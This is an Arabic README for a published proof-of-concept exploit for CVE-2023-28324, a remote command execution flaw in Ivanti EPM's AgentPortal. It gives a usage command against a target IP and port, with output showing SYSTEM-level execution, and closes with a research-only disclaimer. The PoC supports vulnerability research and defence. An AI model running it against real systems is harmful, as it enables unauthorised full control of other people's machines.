
ثغرة RCE في Ivanti EPM AgentPortal
POC لـ CVE-2023-28324 التي تؤثر على Ivanti EPM.
يمكن العثور على تحليل جذري تقني للثغرة في مدونتنا: https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-28324-deep-dive/
يستغل هذا POC ثغرة في AgentPortal.exe لتنفيذ أوامر عشوائية. لكي يعمل هذا POC، يجب عليك
توفير المراجع الخاصة بك لـ AgentPortal.exe و APCommon.dll من تثبيت Ivanti EPM.
CVE-2023-28324.exe 192.168.1.21 49668 whoami.exe
إرسال الطلب.
نتيجة الطلب: صحيح
انتظار النتيجة.
انتظار النتيجة.
النتيجة: nt authority\system
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي فقط ولتطوير تقنيات دفاعية فعالة، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا بإذن صريح. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.